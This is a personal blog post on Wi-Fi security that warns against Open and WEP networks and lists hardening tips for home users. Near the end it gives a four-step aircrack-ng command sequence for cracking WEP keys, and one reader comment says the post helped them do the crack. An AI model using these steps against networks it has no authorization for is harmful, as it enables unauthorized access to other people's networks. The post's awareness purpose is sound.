Wi-fi Security

Desclaimer:  The views expressed here are of the author alone, you may agree or disagree on any of them, code/commands given in the posts worked fine for the author please use them on your own risks they may damage your system.

I am in Pune since more than a year now have attended countless conferences, un-conferences, camps and what not, learnt a lot and atleast i am able to blog, in almost every event security is one of the leading topics is it that big, oh YES !!!, i would like to quote Rohit's statement "Click one centimetre below then what you use to click you would be much more secure".


With regards to Wi-fi i have heard many speakers discouraging the use of Open and WEP type of connection for home as well as corporate use, i truly agree after seeing the WEP crack in Club Hack 2008 i have also included the steps to crack WEP in this post later.

WPA2/802.1x hopefully is the most secure type of connection available today, but for how much time nobody  can comment, it would be cracked that is for sure but currently its the best.

We have seen incidences where in an attacker used an open wifi and send some of the threatening emails, we have also seen occasion when the attacker have stolen crucial data, the problem i see is lack of awareness among the users and the desire to use PLUG n PLAY devices the problem with PLUG n PLAY is you get something configured which is very generic and a common man don't dare to change it i.e don't dare to "click one centimetre below"

Personally i don't believe in PLUG n PLAY devices if i use them them i always manually configure it but its not the case with the normal public how can we ensure security to them when The Engineer from ISP comes and configures  AP in Open Mode? The need is to train our support persons on this. Recently i read an article saying that Cops in Mumbai would help users ensure that there Wifi is secure this is a very welcome step but when will this happen in other cities, when will the government be able to issue a check-list for a generic as well as for the corporate stating if you have done this a,b,c then you have done your part, i trust you.


I strongly believe that the person coming to your home for Internet Connection should configure your AP with WPA2 enabled and discourage using Open/WEP connection, the case is just reverse here hopefully this would improve very soon :)


Recommendations:

  • Never use an Open/WEP Connection
  • Never user Connection such as "Public Free Wi-fi" they may be dangerous
  • Always use WPA or WPA2 enabled connection
  • Home users should turn off AP when not in use
  • Atleast change the router password once a month, dont use admin admin please.
  • Change the default setting of your Access Point
  • Limit the DHCP allocation, recommended is bind with MAC if you have a few machines to use.
  • Always keep a log


Cracking a WEP password

Step 0 ) Use Backtrack with a supported wifi card
Step 1 ) airmon-ng start eth0
Step 2 ) airodump-ng -w capture -c 6 ath0
Step 3 ) aireplay-ng –arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA eth0
Step 4 ) aircrack-ng capture-01.cap


Detailed Guide available at http://mtaram.wordpress.com/2008/12/25/cracking-wep-in-4-steps use this at your own risk, the intention is not to teach any kind of hacking but to show that WEP is very weak.


3 comments

15
Jan

besides backtrack there are

besides backtrack there are various such bootable like the operator etc....
but the tool is aircrack in most cases. I can be used in windows too if you have right kind of hardware...
windows version of aircrack is available @ http://www.aircrack-ng.org/doku.php?id=downloads

14
Jan

U need a tool who develops it

U need a tool who develops it is not the concern if we already have it as Backtrack why not use it

14
Jan

Did'nt attend the conference,

Did'nt attend the conference, ur post ws quite explanatory to help me do the crack. Thanks :)
Would appreciate if this could be cracked without the use of Backtrack.
Hope to see a script by u instead(soon) :)